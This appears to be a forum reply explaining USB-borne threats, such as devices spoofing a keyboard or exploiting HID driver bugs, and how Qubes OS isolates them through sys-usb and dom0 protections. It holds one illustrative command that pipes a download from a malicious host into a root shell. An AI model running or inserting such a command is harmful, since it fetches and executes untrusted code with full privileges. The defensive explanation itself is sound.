First, understand the threats:
- USB device that pretends to be something other than what it visually looks like
- USB device that tries to exploit known vulnerabilities in an operating system USB stack (which can include third-party USB drivers)
Realization (forget about Qubes right now):
- A USB mouse that tells the OS it’s really a keyboard: the mouse can now send keystrokes, such as
curl http://malicious.site/malware | sudo /bin/sh - A USB mouse that is a mouse, but it knows there’s a bug in the HID input driver that can lead to kernel mode code execution. From there that mouse essentially has full control over your computer.
Knowing that, the Qubes approach is to limit and isolate those interactions. dom0 is the most sacred in Qubes/Xen land, so the better we can prevent USB devices talking to the dom0, the better.
Those protections come in the form of:
- Blocking USB (once Xen hands control to dom0 at bootup) while entering disk password
- Limiting USB communication to an untrusted qube (sys-usb)
- Using sys-usb and the Qubes device widget to attach specific USB interfaces to a qube
I notice you use phrases like “it’s not safe”, “you are safe until”, etc. You should answer “safe from what” first.
But the generic answer is:
- Limit what you plug into your computer
- Use the facilities Qubes provides you to attach USB devices to only the qubes needed
- When that doesn’t work, use a disposable sys-usb qube.
The Qubes ideology is the groundbreaking realization that - all code has bugs and vulnerabilities. We will never know all of them, so let’s do as much as we can to stop most of them, have an easy way to recover from exploited bugs (disposable VMs, non-perstent root, etc), yet still have a usable system.